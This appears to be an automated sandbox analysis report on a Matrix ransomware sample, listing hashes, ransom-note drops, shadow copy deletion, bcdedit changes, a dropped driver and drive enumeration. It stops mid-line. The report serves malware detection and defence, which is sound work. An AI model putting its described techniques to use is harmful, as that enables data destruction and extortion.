Analysis
-
max time kernel
150s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-12-2022 10:19
Behavioral task
behavioral1
Sample
2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe
Resource
win10v2004-20220812-en
General
-
Target
2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe
-
Size
610KB
-
MD5
1c73c307773fedfccd544a6b6b0b55b9
-
SHA1
899ffd934e0b8a6df4b115c49df33fca524e2135
-
SHA256
2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376
-
SHA512
049211f9d07e3cca9f92dfb1bc2e0f6895586f9f36b2651ffb2de20f3573ba9d719aff27e67b996f4706852578e919810e3e6854eebf0aaff0d412d8cabc127d
-
SSDEEP
12288:mT9zGQU31phksyH0F8eHSE3BGAFTT/OAchocfoOG6FTvcDldnozRpXFqOO:mRyQUlGuLSE3BGAF//xlcfoO/IDr6FqO
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\de-de\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\Integration\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Filters\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PROFILE\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\gl\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-il\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-ma\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\it-it\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Java\jre1.8.0_66\bin\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\sv-se\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hu-hu\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\ms\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft.NET\ADOMD.NET\130\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fi-fi\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Trust Protection Lists\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_f4\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\sv-se\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_extractor\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\pt-br\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\VideoLAN\VLC\plugins\spu\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MEIPreload\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\eu\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\1033\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\1033\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\de-de\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fi-fi\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hu-hu\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tt\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ur\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2308 bcdedit.exe 1460 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 152 3052 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS trT2KPvl64.exe -
Executes dropped EXE 3 IoCs
pid Process 4340 NWDFhFTl.exe 4040 trT2KPvl.exe 3708 trT2KPvl64.exe -
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\StopPop.tiff 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" trT2KPvl64.exe -
resource yara_rule behavioral2/memory/956-132-0x0000000000400000-0x0000000000582000-memory.dmp upx behavioral2/files/0x0007000000022dff-135.dat upx behavioral2/files/0x0007000000022dff-136.dat upx behavioral2/memory/4340-137-0x0000000000400000-0x0000000000582000-memory.dmp upx behavioral2/memory/956-148-0x0000000000400000-0x0000000000582000-memory.dmp upx behavioral2/memory/4340-160-0x0000000000400000-0x0000000000582000-memory.dmp upx behavioral2/files/0x0006000000022e0c-166.dat upx behavioral2/files/0x0006000000022e0c-167.dat upx behavioral2/memory/4040-168-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/memory/4040-177-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral2/memory/4340-184-0x0000000000400000-0x0000000000582000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation wscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 4468 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 29 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Music\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Links\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Public\Videos\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Public\Documents\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-2629973501-4017243118-3254762364-1000\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Public\Music\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Public\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\S: trT2KPvl64.exe File opened (read-only) \??\Y: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\S: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\N: trT2KPvl64.exe File opened (read-only) \??\O: trT2KPvl64.exe File opened (read-only) \??\Q: trT2KPvl64.exe File opened (read-only) \??\R: trT2KPvl64.exe File opened (read-only) \??\W: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\Q: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\E: trT2KPvl64.exe File opened (read-only) \??\F: trT2KPvl64.exe File opened (read-only) \??\H: trT2KPvl64.exe File opened (read-only) \??\M: trT2KPvl64.exe File opened (read-only) \??\T: trT2KPvl64.exe File opened (read-only) \??\X: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\P: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\I: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\H: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\G: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\U: trT2KPvl64.exe File opened (read-only) \??\V: trT2KPvl64.exe File opened (read-only) \??\Y: trT2KPvl64.exe File opened (read-only) \??\V: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\O: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\N: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\G: trT2KPvl64.exe File opened (read-only) \??\L: trT2KPvl64.exe File opened (read-only) \??\K: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\Z: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\B: trT2KPvl64.exe File opened (read-only) \??\Z: trT2KPvl64.exe File opened (read-only) \??\F: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\E: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\J: trT2KPvl64.exe File opened (read-only) \??\U: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\R: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\M: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\L: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\J: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\P: trT2KPvl64.exe File opened (read-only) \??\X: trT2KPvl64.exe File opened (read-only) \??\T: 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened (read-only) \??\A: trT2KPvl64.exe File opened (read-only) \??\I: trT2KPvl64.exe File opened (read-only) \??\K: trT2KPvl64.exe File opened (read-only) \??\W: trT2KPvl64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 151 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\5P8E7x8U.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Grace-ul-oob.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hr-hr\ui-strings.js 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyrun.jar 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_MoveNoDrop32x32.gif 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-cn\ui-strings.js 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\#FOX_README#.rtf 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_Subscription-ul-oob.xrm-ms 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files\Mozilla Firefox\omni.ja 2e4c3ae32372bb1b189665e8e84c13bcc88e7f2c7459f71e075694fd3aaf8376.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader 